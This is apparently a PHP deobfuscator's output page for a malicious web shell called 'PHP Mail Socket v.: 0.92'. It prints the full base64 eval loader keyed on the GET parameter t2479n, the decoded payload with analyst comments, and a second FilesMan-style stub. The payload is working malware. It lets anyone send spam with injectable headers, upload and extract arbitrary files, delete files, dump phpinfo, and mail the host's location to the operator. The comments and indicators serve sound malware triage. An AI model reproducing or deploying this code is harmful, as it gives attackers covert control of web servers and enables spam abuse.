PHP Decode
<?php if(isset($_GET["t2479n"])){ eval(base64_decode("ZGVmaW5lKCJERUZDQUxMQkFDS01BS..
Decoded Output
// Decoded payload of the eval(base64_decode(...)) loader shown under "Original Code":
// a remotely driven mail sender with file upload, archive extraction, file deletion
// and phpinfo() commands. Its own banner calls it "PHP Mail Socket v.: 0.92".
// The loader evaluates this payload only when the GET parameter t2479n is present;
// inside the payload there is no authentication, input validation or output escaping.
// NOTE(review): string literals below contain literal line breaks where the payload
// has escape sequences; this looks like a rendering artifact of the decoder, so the
// listing is not a byte-exact copy of what runs.
//
// Triage indicators visible in this block: request fields from/to/subject/att/cmd/
// arch_file, upload field "userfile", cmd values mail/unzip/flUpl/unlink/phpinfo/etest,
// the banner string, and the outbound mail subject "Shell test check".

// Sender address comes from POST 'from' and is later concatenated unfiltered into
// the Reply-To, Return-Path and From headers built by preparehtmlmail().
define("DEFCALLBACKMAIL", $_POST['from']);
// Recipient, subject, template filename, command selector and archive path are all
// taken directly from the POST body.
$tomail = $_POST['to'];
$subj = $_POST['subject'];
$file = $_POST['att'];
$cmd = $_POST['cmd'];
$arch_file = $_POST['arch_file'];
// Hard-coded address used only by the 'etest' branch below. The value shown here is
// masked by the hosting page's e-mail protection; the real one is in the base64 payload.
$etest_mail = '[email protected]';
$dir = dirname(__FILE__)."/";
// The template is read and the MIME message is built before $cmd is examined, so this
// file read happens on every request. $file is appended to the script directory with
// no check for '../' segments.
$html = file_get_contents($dir.$file);
$final_msg = preparehtmlmail($html,$dir);
// cmd=mail: send one message to the request-supplied recipient.
if($cmd == 'mail'){
// Echoes request data back unescaped.
print_r($arch_file);
// fopen() is used only as an existence probe (errors suppressed, handle never closed).
// It resolves $file against the working directory, whereas the read above used $dir.$file.
if (@fopen($file, "r")) {
if (mail($tomail, $subj, $final_msg['multipart'], $final_msg['headers'])) {
echo "Ok";
// A top-level return ends the eval'd payload; the loader then calls exit.
return true;
}else{
echo "MTA error!";
return false;
}
}else{
print_r($arch_file);
echo "test";
// Thrown when the template could NOT be opened, despite the wording of the message.
throw new Exception("Template exist!");
}
// cmd=unzip: extract a request-named archive into the working directory.
// Entry names and types are not checked, so any file type, PHP included, can be written.
}elseif ($cmd == 'unzip' && !empty($arch_file)){
$zip = new ZipArchive;
$res = $zip->open($arch_file);
if ($res === TRUE) {
$zip->extractTo('./');
$zip->close();
echo 'ok';
} else {
echo 'failed';
}
// cmd=flUpl: unauthenticated upload into the working directory, followed by an attempt
// to unpack the uploaded file as a ZIP archive.
}elseif($cmd == 'flUpl'){
$uploaddir = realpath('./') . '/';
// basename() strips directory components from the client-supplied name, but there is
// no restriction on extension or content type.
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
echo '<pre>';
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
$zip = new ZipArchive;
// Re-opens the upload by its raw client-supplied name (relative path), not $uploadfile.
$res = $zip->open($_FILES['userfile']['name']);
echo "--------------".$_SERVER['SERVER_NAME']."--------------<br>";
echo "File is valid, and was successfully uploaded.
";
if ($res === TRUE) {
$zip->extractTo('./');
$zip->close();
echo '<br>and Unpacked<br>';
} else {
echo $_FILES['userfile']['error'];
echo '<br>unpack failed<br>';
}
} else {
echo "Possible file upload attack!
";
}
// No recognised POST cmd: print the version banner and report ZIP extension status.
}else{
echo "PHP Mail Socket v.: 0.92<br><br>";
// The red message is printed when the zip extension is NOT loaded, despite saying "is exist".
if (!extension_loaded('zip')) {
echo '<small><FONT style="BACKGROUND-COLOR:#FF0000">ZIP module is exist!!! Upload you your template manualy.</FONT></small><br><br>';
}else{
echo '<small><FONT style="BACKGROUND-COLOR:#00FF00">ZIP module is loaded.</FONT></small><br><br>';
}
}
// The GET-driven commands below are checked independently of the POST dispatch above.
// cmd=unlink: deletes whatever path GET 'file' names, then echoes that path unescaped.
if($_GET['cmd'] == 'unlink' && !empty($_GET['file'])){
unlink($_GET['file']);
echo "Removed: ".$_GET['file'];
}
// cmd=phpinfo: discloses the full PHP configuration to the requester.
if($_GET['cmd'] == 'phpinfo'){
phpinfo();
}
// cmd=etest: mails this script's host and path (query string removed, dots replaced by
// spaces) to the hard-coded address, reporting where the script is installed.
if($_GET['cmd'] == 'etest'){
// HTTP_HOST and REQUEST_URI are written as bare constants, not quoted keys. Older PHP
// treats them as strings with a notice; PHP 8 raises an Error for the undefined constant.
$url = $_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI];
$url = explode('?', $url);
$url = str_replace(".", " ", $url['0']);
if(mail($etest_mail, 'Shell test check', '_'.$url.' - Ok')) {
echo "<b>Ok<b>";
return true;
}else{
echo "</b>MTA error!</b>";
return false;
}
}
/**
 * Builds a multipart/mixed mail body and header block from an HTML template.
 *
 * Image sources found in the template are read from disk under $dir, attached as
 * base64 parts, and rewritten in the HTML to cid: references.
 *
 * @param string $html Template markup (the caller passes the contents of a request-named file).
 * @param string $dir  Directory prefix prepended to every image path.
 * @return array|false array('multipart' => body, 'headers' => header block), or false
 *                     (after echoing "File cannot be loaded") when an image handle is missing.
 */
function preparehtmlmail($html,$dir) {
// Captures the src value of each <img>. The character class allows '.', '/' and ':',
// so relative segments such as '../' are matched like any other path.
preg_match_all('~<img.*?src=.([\/.a-z0-9:_-]+).*?>~si',$html,$matches);
$i = 0;
$paths = array();
foreach ($matches[1] as $img) {
$img_old = $img;
// Loose comparison: true when "http://" is absent (false) and also when it is found at
// offset 0 (0 == false). Only sources with "http://" at a non-zero offset are skipped.
if(strpos($img, "http://") == false) {
$uri = parse_url($img);
// No normalisation or containment check: the template content decides which files on
// disk are read and embedded into the outgoing message.
$paths[$i]['path'] = $dir.$uri['path'];
$content_id = md5($img);
$html = str_replace($img_old,'cid:'.$content_id,$html);
$paths[$i++]['cid'] = $content_id;
}
}
// The boundary value itself starts with "--", so delimiter lines begin with four dashes.
$boundary = "--".md5(uniqid(time()));
$headers = "MIME-Version: 1.0
";
$headers .="Content-Type: multipart/mixed; boundary=\"$boundary\"
";
// DEFCALLBACKMAIL is the raw POST 'from' value. It is concatenated into three headers
// without stripping CR/LF, so the requester can inject further headers.
// "MonsterBeats" is a fixed display name and Organization value, useful as a
// mail-side indicator when matching spam samples to this script.
$headers .= "Reply-To: MonsterBeats <".DEFCALLBACKMAIL.">
";
$headers .= "Return-Path: MonsterBeats <".DEFCALLBACKMAIL.">
";
$headers .= "Organization: MonsterBeats
";
$headers .= "From: ".DEFCALLBACKMAIL."
";
$multipart = '';
$multipart .= "--$boundary
";
$kod = 'utf-8';
$multipart .= "Content-Type: text/html; charset=$kod
";
// "Quot-Printed" is not a valid Content-Transfer-Encoding token (the standard one is
// quoted-printable), and the HTML is appended below without any encoding.
$multipart .= "Content-Transfer-Encoding: Quot-Printed
";
$multipart .= "$html
";
foreach ($paths as $path) {
// $fp is assigned only when the file exists. Otherwise it is undefined on the first
// pass, or left over from the previous pass, when the check below runs.
if(file_exists($path['path']))
$fp = fopen($path['path'],"r");
if (!$fp) {
echo "File cannot be loaded";
return false;
}
// Extension is the text after the last '.'; the whole file is read into memory.
$imagetype = substr(strrchr($path['path'], '.' ),1);
$file = fread($fp, filesize($path['path']));
fclose($fp);
$message_part = "";
// No default case: for any other extension the part gets no Content-Type, and its first
// line starts with the "; file_name = ..." fragment appended below.
switch ($imagetype) {
case 'png':
case 'PNG':
$message_part .= "Content-Type: image/png";
break;
case 'jpg':
case 'jpeg':
case 'JPG':
case 'JPEG':
$message_part .= "Content-Type: image/jpeg";
break;
case 'gif':
case 'GIF':
$message_part .= "Content-Type: image/gif";
break;
}
// Writes the full on-disk path ($dir + image path) into every attachment header, so a
// captured message shows the sending host's filesystem layout.
$message_part .= "; file_name = ".$path['path']. "
";
$message_part .= "Content-ID: <" . $path['cid'] . ">
";
$message_part .= "Content-Transfer-Encoding: base64
";
$message_part .= "Content-Disposition: inline; filename = \"" . basename($path['path']) . "\"
";
$message_part .= chunk_split(base64_encode($file))."
";
$multipart .= "--$boundary
".$message_part."
";
}
// Closing delimiter.
$multipart .= "--$boundary--
";
return array('multipart' => $multipart, 'headers' => $headers);
}
Original Code
<?php if(isset($_GET["t2479n"])){ eval(base64_decode("ZGVmaW5lKCJERUZDQUxMQkFDS01BSUwiLCAkX1BPU1RbJ2Zyb20nXSk7CiR0b21haWwgPSAkX1BPU1RbJ3RvJ107CiRzdWJqID0gJF9QT1NUWydzdWJqZWN0J107CiRmaWxlID0gJF9QT1NUWydhdHQnXTsKJGNtZCA9ICRfUE9TVFsnY21kJ107CiRhcmNoX2ZpbGUgPSAkX1BPU1RbJ2FyY2hfZmlsZSddOwokZXRlc3RfbWFpbCA9ICdjb211YTlAZ21haWwuY29tJzsKCgokZGlyID0gZGlybmFtZShfX0ZJTEVfXykuIi8iOwoKJGh0bWwgPSBmaWxlX2dldF9jb250ZW50cygkZGlyLiRmaWxlKTsKJGZpbmFsX21zZyA9IHByZXBhcmVodG1sbWFpbCgkaHRtbCwkZGlyKTsKCmlmKCRjbWQgPT0gJ21haWwnKXsKCXByaW50X3IoJGFyY2hfZmlsZSk7IAoJaWYgKEBmb3BlbigkZmlsZSwgInIiKSkgewoJCWlmIChtYWlsKCR0b21haWwsICRzdWJqLCAkZmluYWxfbXNnWydtdWx0aXBhcnQnXSwgJGZpbmFsX21zZ1snaGVhZGVycyddKSkgewoJCQllY2hvICJPayI7CgkJCXJldHVybiB0cnVlOwoJCX1lbHNlewoJCQllY2hvICJNVEEgZXJyb3IhIjsKCQkJcmV0dXJuIGZhbHNlOwoJCX0KCX1lbHNlewoJCXByaW50X3IoJGFyY2hfZmlsZSk7CgkJZWNobyAidGVzdCI7CgkJdGhyb3cgbmV3IEV4Y2VwdGlvbigiVGVtcGxhdGUgZXhpc3QhIik7Cgl9Cn1lbHNlaWYgKCRjbWQgPT0gJ3VuemlwJyAmJiAhZW1wdHkoJGFyY2hfZmlsZSkpewoJJHppcCA9IG5ldyBaaXBBcmNoaXZlOwoJJHJlcyA9ICR6aXAtPm9wZW4oJGFyY2hfZmlsZSk7CglpZiAoJHJlcyA9PT0gVFJVRSkgewoJCSR6aXAtPmV4dHJhY3RUbygnLi8nKTsKCQkkemlwLT5jbG9zZSgpOwoJCWVjaG8gJ29rJzsKCX0gZWxzZSB7CgkJZWNobyAnZmFpbGVkJzsKCX0KfWVsc2VpZigkY21kID09ICdmbFVwbCcpewoJJHVwbG9hZGRpciA9IHJlYWxwYXRoKCcuLycpIC4gJy8nOwoJJHVwbG9hZGZpbGUgPSAkdXBsb2FkZGlyIC4gYmFzZW5hbWUoJF9GSUxFU1sndXNlcmZpbGUnXVsnbmFtZSddKTsKCWVjaG8gJzxwcmU+JzsKCWlmIChtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1sndXNlcmZpbGUnXVsndG1wX25hbWUnXSwgJHVwbG9hZGZpbGUpKSB7CgkJJHppcCA9IG5ldyBaaXBBcmNoaXZlOwoJCSRyZXMgPSAkemlwLT5vcGVuKCRfRklMRVNbJ3VzZXJmaWxlJ11bJ25hbWUnXSk7CgkJZWNobyAiLS0tLS0tLS0tLS0tLS0iLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiItLS0tLS0tLS0tLS0tLTxicj4iOwoJCWVjaG8gIkZpbGUgaXMgdmFsaWQsIGFuZCB3YXMgc3VjY2Vzc2Z1bGx5IHVwbG9hZGVkLlxuIjsKCQlpZiAoJHJlcyA9PT0gVFJVRSkgewoJCQkkemlwLT5leHRyYWN0VG8oJy4vJyk7CgkJCSR6aXAtPmNsb3NlKCk7CgkJCWVjaG8gJzxicj5hbmQgVW5wYWNrZWQ8YnI+JzsKCQl9IGVsc2UgewoJCQllY2hvICRfRklMRVNbJ3VzZXJmaWxlJ11bJ2Vycm9yJ107CgkJCWVjaG8gJzxicj51bnBhY2sgZmFpbGVkPGJyPic7CgkJfQ
oJfSBlbHNlIHsKCQllY2hvICJQb3NzaWJsZSBmaWxlIHVwbG9hZCBhdHRhY2shXG4iOwoJfQp9ZWxzZXsKCWVjaG8gIlBIUCBNYWlsIFNvY2tldCB2LjogMC45Mjxicj48YnI+IjsKCWlmICghZXh0ZW5zaW9uX2xvYWRlZCgnemlwJykpIHsKCQllY2hvICc8c21hbGw+PEZPTlQgc3R5bGU9IkJBQ0tHUk9VTkQtQ09MT1I6I0ZGMDAwMCI+WklQIG1vZHVsZSBpcyBleGlzdCEhISBVcGxvYWQgeW91IHlvdXIgdGVtcGxhdGUgbWFudWFseS48L0ZPTlQ+PC9zbWFsbD48YnI+PGJyPic7Cgl9ZWxzZXsKCQllY2hvICc8c21hbGw+PEZPTlQgc3R5bGU9IkJBQ0tHUk9VTkQtQ09MT1I6IzAwRkYwMCI+WklQIG1vZHVsZSBpcyBsb2FkZWQuPC9GT05UPjwvc21hbGw+PGJyPjxicj4nOwoJfQp9CgppZigkX0dFVFsnY21kJ10gPT0gJ3VubGluaycgJiYgIWVtcHR5KCRfR0VUWydmaWxlJ10pKXsKCXVubGluaygkX0dFVFsnZmlsZSddKTsKCWVjaG8gIlJlbW92ZWQ6ICIuJF9HRVRbJ2ZpbGUnXTsKfQppZigkX0dFVFsnY21kJ10gPT0gJ3BocGluZm8nKXsKCXBocGluZm8oKTsKfQoKaWYoJF9HRVRbJ2NtZCddID09ICdldGVzdCcpewoJJHVybCA9ICRfU0VSVkVSW0hUVFBfSE9TVF0uJF9TRVJWRVJbUkVRVUVTVF9VUkldOwoJJHVybCA9IGV4cGxvZGUoJz8nLCAkdXJsKTsKCSR1cmwgPSBzdHJfcmVwbGFjZSgiLiIsICIgIiwgJHVybFsnMCddKTsKCWlmKG1haWwoJGV0ZXN0X21haWwsICdTaGVsbCB0ZXN0IGNoZWNrJywgJ18nLiR1cmwuJyAtIE9rJykpIHsKCQllY2hvICI8Yj5PazxiPiI7CgkJcmV0dXJuIHRydWU7Cgl9ZWxzZXsKCQllY2hvICI8L2I+TVRBIGVycm9yITwvYj4iOwoJCXJldHVybiBmYWxzZTsKCX0KfQoKZnVuY3Rpb24gcHJlcGFyZWh0bWxtYWlsKCRodG1sLCRkaXIpIHsKCglwcmVnX21hdGNoX2FsbCgnfjxpbWcuKj9zcmM9LihbXC8uYS16MC05Ol8tXSspLio/Pn5zaScsJGh0bWwsJG1hdGNoZXMpOwoJJGkgPSAwOwoJJHBhdGhzID0gYXJyYXkoKTsKCWZvcmVhY2ggKCRtYXRjaGVzWzFdIGFzICRpbWcpIHsKCQkkaW1nX29sZCA9ICRpbWc7CgoJCWlmKHN0cnBvcygkaW1nLCAiaHR0cDovLyIpID09IGZhbHNlKSB7CgkJCSR1cmkgPSBwYXJzZV91cmwoJGltZyk7CgkJCSRwYXRoc1skaV1bJ3BhdGgnXSA9ICRkaXIuJHVyaVsncGF0aCddOwoJCQkkY29udGVudF9pZCA9IG1kNSgkaW1nKTsKCQkJJGh0bWwgPSBzdHJfcmVwbGFjZSgkaW1nX29sZCwnY2lkOicuJGNvbnRlbnRfaWQsJGh0bWwpOwoJCQkkcGF0aHNbJGkrK11bJ2NpZCddID0gJGNvbnRlbnRfaWQ7CgkJfQoJfQoKCSRib3VuZGFyeSA9ICItLSIubWQ1KHVuaXFpZCh0aW1lKCkpKTsKCSRoZWFkZXJzID0gIk1JTUUtVmVyc2lvbjogMS4wXG4iOwoJJGhlYWRlcnMgLj0iQ29udGVudC1UeXBlOiBtdWx0aXBhcnQvbWl4ZWQ7IGJvdW5kYXJ5PVwiJGJvdW5kYXJ5XCJcbiI7CgoJJGhlYWRlcnMgLj0gIlJlcGx5LVRvOiBNb25zdGVyQmVhdHMgPCIuREVGQ0FMTEJBQ0tNQUlMLiI+XHJcbi
I7CgkkaGVhZGVycyAuPSAiUmV0dXJuLVBhdGg6IE1vbnN0ZXJCZWF0cyA8Ii5ERUZDQUxMQkFDS01BSUwuIj5cclxuIjsKCSRoZWFkZXJzIC49ICJPcmdhbml6YXRpb246IE1vbnN0ZXJCZWF0c1xyXG4iOwoKCSRoZWFkZXJzIC49ICJGcm9tOiAiLkRFRkNBTExCQUNLTUFJTC4iXHJcbiI7CgkkbXVsdGlwYXJ0ID0gJyc7CgkkbXVsdGlwYXJ0IC49ICItLSRib3VuZGFyeVxuIjsKCSRrb2QgPSAndXRmLTgnOwoJJG11bHRpcGFydCAuPSAiQ29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9JGtvZFxuIjsKCSRtdWx0aXBhcnQgLj0gIkNvbnRlbnQtVHJhbnNmZXItRW5jb2Rpbmc6IFF1b3QtUHJpbnRlZFxuXG4iOwoJJG11bHRpcGFydCAuPSAiJGh0bWxcblxuIjsKCglmb3JlYWNoICgkcGF0aHMgYXMgJHBhdGgpIHsKCQlpZihmaWxlX2V4aXN0cygkcGF0aFsncGF0aCddKSkKCQkJJGZwID0gZm9wZW4oJHBhdGhbJ3BhdGgnXSwiciIpOwoJCWlmICghJGZwKSAgewoJCQllY2hvICJGaWxlIGNhbm5vdCBiZSBsb2FkZWQiOwoJCQlyZXR1cm4gZmFsc2U7CgkJfQoKCQkkaW1hZ2V0eXBlID0gc3Vic3RyKHN0cnJjaHIoJHBhdGhbJ3BhdGgnXSwgJy4nICksMSk7CgkJJGZpbGUgPSBmcmVhZCgkZnAsIGZpbGVzaXplKCRwYXRoWydwYXRoJ10pKTsKCQlmY2xvc2UoJGZwKTsKCgkJJG1lc3NhZ2VfcGFydCA9ICIiOwoKCQlzd2l0Y2ggKCRpbWFnZXR5cGUpIHsKCQkJY2FzZSAncG5nJzoKCQkJY2FzZSAnUE5HJzoKCQkJCSRtZXNzYWdlX3BhcnQgLj0gIkNvbnRlbnQtVHlwZTogaW1hZ2UvcG5nIjsKCQkJCWJyZWFrOwoJCQljYXNlICdqcGcnOgoJCQljYXNlICdqcGVnJzoKCQkJY2FzZSAnSlBHJzoKCQkJY2FzZSAnSlBFRyc6CgkJCQkkbWVzc2FnZV9wYXJ0IC49ICJDb250ZW50LVR5cGU6IGltYWdlL2pwZWciOwoJCQkJYnJlYWs7CgkJCWNhc2UgJ2dpZic6CgkJCWNhc2UgJ0dJRic6CgkJCQkkbWVzc2FnZV9wYXJ0IC49ICJDb250ZW50LVR5cGU6IGltYWdlL2dpZiI7CgkJCQlicmVhazsKCQl9CgkJJG1lc3NhZ2VfcGFydCAuPSAiOyBmaWxlX25hbWUgPSAiLiRwYXRoWydwYXRoJ10uICJcbiI7CgkJJG1lc3NhZ2VfcGFydCAuPSAiQ29udGVudC1JRDogPCIgLiAkcGF0aFsnY2lkJ10gLiAiPlxuIjsKCQkkbWVzc2FnZV9wYXJ0IC49ICJDb250ZW50LVRyYW5zZmVyLUVuY29kaW5nOiBiYXNlNjRcbiI7CgkJJG1lc3NhZ2VfcGFydCAuPSAiQ29udGVudC1EaXNwb3NpdGlvbjogaW5saW5lOyBmaWxlbmFtZSA9IFwiIiAuIGJhc2VuYW1lKCRwYXRoWydwYXRoJ10pIC4gIlwiXG5cbiI7CgkJJG1lc3NhZ2VfcGFydCAuPSBjaHVua19zcGxpdChiYXNlNjRfZW5jb2RlKCRmaWxlKSkuIlxuIjsKCQkkbXVsdGlwYXJ0IC49ICItLSRib3VuZGFyeVxuIi4kbWVzc2FnZV9wYXJ0LiJcbiI7CgoJfQoKCSRtdWx0aXBhcnQgLj0gIi0tJGJvdW5kYXJ5LS1cbiI7CglyZXR1cm4gYXJyYXkoJ211bHRpcGFydCcgPT4gJG11bHRpcGFydCwgJ2hlYWRlcnMnID0+ICRoZW
FkZXJzKTsKfQ==")); exit; } ?><?php if(isset($_GET["t6699n"])){ $auth_pass="";$color="#df5";$default_action="FilesMan";$default_use_ajax=true;$default_charset="Windows-1251"; exit; } ?>
Function Calls
base64_decode | 1 |
Stats
MD5 | 2762c634b896bc4d53676a36fdddad02 |
Eval Count | 1 |
Decode Time | 133 ms |